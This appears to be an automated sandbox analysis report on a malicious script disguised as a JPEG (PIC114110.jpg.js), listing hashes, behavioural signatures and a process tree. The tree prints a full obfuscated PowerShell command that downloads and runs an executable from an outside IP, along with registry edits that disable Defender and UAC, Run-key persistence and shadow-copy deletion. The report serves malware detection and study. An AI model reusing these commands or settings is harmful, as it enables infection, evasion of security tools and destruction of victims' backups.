Analysis
- max time kernel: 131s
- max time network: 134s
- platform: windows10_x64
- resource: win10v200430
- submitted: 08-07-2020 01:06
- Static task: static1
- Behavioral task: behavioral1 (Sample: PIC114110.jpg.js, Resource: win7)
- Behavioral task: behavioral2 (Sample: PIC114110.jpg.js, Resource: win10v200430)
General
- Target: PIC114110.jpg.js
- Size: 83KB
- MD5: 821a6c3122354612133a542992bab324
- SHA1: efdbbf3dbeed7f53ccf2b73d7afcc6d16c8ca320
- SHA256: 370dbeca970b02f6c1a07803c736de0fa30a40851f7a21178eb0bdaa16af61ab
- SHA512: 6474f350bf4790a681677400019d2540d75468d307535a73f296acb3792fb8b19e14140c6b0ad712cd91d493fdeea59048117d07853f2d6c6f189a906a17dc46
Malware Config
- Extracted: http://217.8.117.63/tstjs.exe
Signatures
- Suspicious use of AdjustPrivilegeToken (67 IoCs)
  description                     pid   Process
  Token: SeDebugPrivilege         1548  powershell.exe
  Token: SeBackupPrivilege        1836  vssvc.exe
  Token: SeRestorePrivilege       1836  vssvc.exe
  Token: SeAuditPrivilege         1836  vssvc.exe
  The three wmic.exe instances (PIDs 3392, 1580 and 2732) each enabled the same 21 tokens, listed once here:
  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- Suspicious behavior: EnumeratesProcesses (545 IoCs)
  pid   Process
  1548  powershell.exe
  3284  2705719231.exe
  (The 545 hits are repeated occurrences of these two processes; all but three come from PID 3284.)
- Modifies service (2 TTPs, 4 IoCs)
  description  ioc                                                                                  Process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                       vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                  vssvc.exe
- Interacts with shadow copies (2 TTPs, 3 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid   Process
  952   vssadmin.exe
  3600  vssadmin.exe
  2120  vssadmin.exe
- Enumerates connected drives (3 TTPs)
- Executes dropped EXE (3 IoCs)
  pid   Process
  1492  TempLrD47.exe
  2572  taskhostw.exe
  3284  2705719231.exe
- Windows security bypass (signature name missing from the extracted page; taken from the process tree entry for taskhostw.exe)
  description      ioc                                                                                            Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"        taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"          taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"         taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"   taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"     taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"    taskhostw.exe
- Modifies Windows Defender Real-time Protection settings (signature name missing from the extracted page; taken from the process tree entry for taskhostw.exe)
  description      ioc                                                                                                              Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"    taskhostw.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"    taskhostw.exe
- Checks whether UAC is enabled (signature name missing from the extracted page; taken from the process tree entry for 2705719231.exe)
  description      ioc                                                                                  Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  2705719231.exe
- Drops desktop.ini file(s) (1 IoCs)
  description                   ioc                                                                                      Process
  File opened for modification  \??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini            2705719231.exe
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Blacklisted process makes network request (1 IoCs)
  flow  pid   Process
  3     1548  powershell.exe
- Adds Run entry to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                                                                            Process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\218571821623978\\taskhostw.exe"                                      TempLrD47.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\218571821623978\\taskhostw.exe"  TempLrD47.exe
- Drops file in Windows directory (3 IoCs)
  description                   ioc                                        Process
  File created                  C:\Windows\218571821623978\taskhostw.exe   TempLrD47.exe
  File opened for modification  C:\Windows\218571821623978\taskhostw.exe   TempLrD47.exe
  File opened for modification  C:\Windows\218571821623978                 TempLrD47.exe
- Windows security modification (signature name missing from the extracted page; taken from the process tree entry for taskhostw.exe)
  description      ioc                                                                                            Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1"  taskhostw.exe
- UAC bypass (signature name missing from the extracted page; taken from the process tree entry for 2705719231.exe)
  description      ioc                                                                                                  Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"                   2705719231.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  2705719231.exe
- Suspicious use of WriteProcessMemory (31 IoCs; identical rows are collapsed with a count)
  description                          pid   Process          procid_target  count
  PID 988 wrote to memory of 1272      988   wscript.exe      68             2
  PID 1272 wrote to memory of 1548     1272  cmd.exe          70             2
  PID 1272 wrote to memory of 1492     1272  cmd.exe          71             3
  PID 1492 wrote to memory of 2572     1492  TempLrD47.exe    73             3
  PID 2572 wrote to memory of 3284     2572  taskhostw.exe    77             3
  PID 3284 wrote to memory of 3392     3284  2705719231.exe   78             3
  PID 3284 wrote to memory of 952      3284  2705719231.exe   82             3
  PID 3284 wrote to memory of 1580     3284  2705719231.exe   85             3
  PID 3284 wrote to memory of 3600     3284  2705719231.exe   87             3
  PID 3284 wrote to memory of 2732     3284  2705719231.exe   89             3
  PID 3284 wrote to memory of 2120     3284  2705719231.exe   91             3
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  10    api.myip.com
  11    api.myip.com
- System policy modification (1 TTPs, 1 IoCs)
  description      ioc                                                                                               Process
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  2705719231.exe
Processes
- C:\Windows\system32\wscript.exe (PID: 988)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC114110.jpg.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID: 1272)
    Command line: "C:\Windows\System32\cmd.exe" /c SGIuanAqBiKFHsR & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','%temp%LrD47.exe'); & %temp%LrD47.exe & IzCrmFNBwYXdgpf
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 1548)
      Command line: PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://217.8.117.63/tstjs.exe','C:\Users\Admin\AppData\Local\TempLrD47.exe');
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
    - C:\Users\Admin\AppData\Local\TempLrD47.exe (PID: 1492)
      Command line: C:\Users\Admin\AppData\Local\TempLrD47.exe
      - Executes dropped EXE
      - Adds Run entry to start application
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
      - C:\Windows\218571821623978\taskhostw.exe (PID: 2572)
        Command line: C:\Windows\218571821623978\taskhostw.exe
        - Executes dropped EXE
        - Windows security bypass
        - Modifies Windows Defender Real-time Protection settings
        - Windows security modification
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Local\Temp\2705719231.exe (PID: 3284)
          Command line: C:\Users\Admin\AppData\Local\Temp\2705719231.exe
          - Suspicious behavior: EnumeratesProcesses
          - Executes dropped EXE
          - Checks whether UAC is enabled
          - Drops desktop.ini file(s)
          - UAC bypass
          - Suspicious use of WriteProcessMemory
          - System policy modification
          - C:\Windows\SysWOW64\Wbem\wmic.exe (PID: 3392)
            Command line: wmic.exe SHADOWCOPY /nointeractive
            - Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\vssadmin.exe (PID: 952)
            Command line: vssadmin.exe Delete Shadows /All /Quiet
            - Interacts with shadow copies
          - C:\Windows\SysWOW64\Wbem\wmic.exe (PID: 1580)
            Command line: wmic.exe SHADOWCOPY /nointeractive
            - Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\vssadmin.exe (PID: 3600)
            Command line: vssadmin.exe Delete Shadows /All /Quiet
            - Interacts with shadow copies
          - C:\Windows\SysWOW64\Wbem\wmic.exe (PID: 2732)
            Command line: wmic.exe SHADOWCOPY /nointeractive
            - Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\vssadmin.exe (PID: 2120)
            Command line: vssadmin.exe Delete Shadows /All /Quiet
            - Interacts with shadow copies
- C:\Windows\system32\vssvc.exe (PID: 1836)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service